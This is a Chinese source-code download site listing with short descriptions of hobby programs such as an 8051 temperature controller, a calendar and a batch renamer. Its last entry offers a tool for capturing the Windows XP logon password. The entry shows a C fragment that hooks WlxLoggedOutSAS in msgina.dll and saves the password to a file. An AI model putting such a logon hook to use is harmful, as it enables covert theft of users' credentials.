-
基于AD590和52单片机00的只能温控系统
#include
#define uchar unsigned char
#define uint unsigned int
sbit lcden=P3^3;
sbit lcdrs=P3^4;
sbit lcdrw=P3^5;
sbit eoc=P3^2;
sbit ale=P2^4;
sbit st=P2^4;
sbit oe=P2^5;
sbit clk=P2^3;
unsigned long dianya=0;
uchar num;
uchar code table[]="the range:0-100";
uchar code ta
- 2022-03-23 02:09:17下载
- 积分:1
-
一个比较简单的日历小程序,希望大家能喜欢。
一个比较简单的日历小程序,希望大家能喜欢。-a relatively simple procedure of the calendar small, I hope you will like.
- 2023-02-13 10:55:03下载
- 积分:1
-
PCRE 开源的Regular Expression 源代码,Perl 流派
PCRE 开源的Regular Expression 源代码,Perl 流派-Regular Expression of the open source PCRE source code, Perl Schools
- 2022-02-15 01:56:09下载
- 积分:1
-
用WIN32SDK+GDI写的一个简单小球物理掉落模型
用WIN32SDK+GDI写的一个简单小球物理掉落模型
-WIN32SDK GDI was made using a simple ball physics model flop
- 2022-06-25 23:13:57下载
- 积分:1
-
一个电子时钟的小程序(――取消目录及其所包含子目录和文件的“只读”属性。否则,打开vc项目时由于无法进行文件的“写”操作,会导致提示出错信息。)...
一个电子时钟的小程序(――取消目录及其所包含子目录和文件的“只读”属性。否则,打开vc项目时由于无法进行文件的“写”操作,会导致提示出错信息。)-An electronic clock applet (- the abolition of the directory and its subdirectories and files contained in the
- 2022-07-10 06:04:18下载
- 积分:1
-
这是一个小getlink是用来收集网站名称的工具,它是用来…
这是一个收集整理网址的小东东GetLink,主要运用ini文件保存网址类别,dat文件保存网址,支持多视通信,可以直接从IE页面上拖放网址。 -this is a little tool name of GetLink that is used to collect website,It is used to save web s catalog by .ini file and to save website by .dat file and to insist mult-visual comunication and to draw website inderectly from IE browser
- 2022-07-17 04:28:31下载
- 积分:1
-
自己编写的批量重命名软件,对于批量修改文件名非常有用。...
自己编写的批量重命名软件,对于批量修改文件名非常有用。-I have written batch rename software, batch modify file name for the very useful.
- 2022-03-17 02:40:49下载
- 积分:1
-
tree树的模拟
tree树的模拟-tree tree simulation
- 2022-05-19 16:47:37下载
- 积分:1
-
Windows ce operating system for memory management used in memory allocation, rec...
对windows ce操作系统的存储管理采用的内存分配,回收,虚拟内存映像,调页等机制作深入的探讨-Windows ce operating system for memory management used in memory allocation, recovery, virtual memory mapping, paging and other mechanisms to explore deeper into the
- 2022-08-16 02:34:27下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1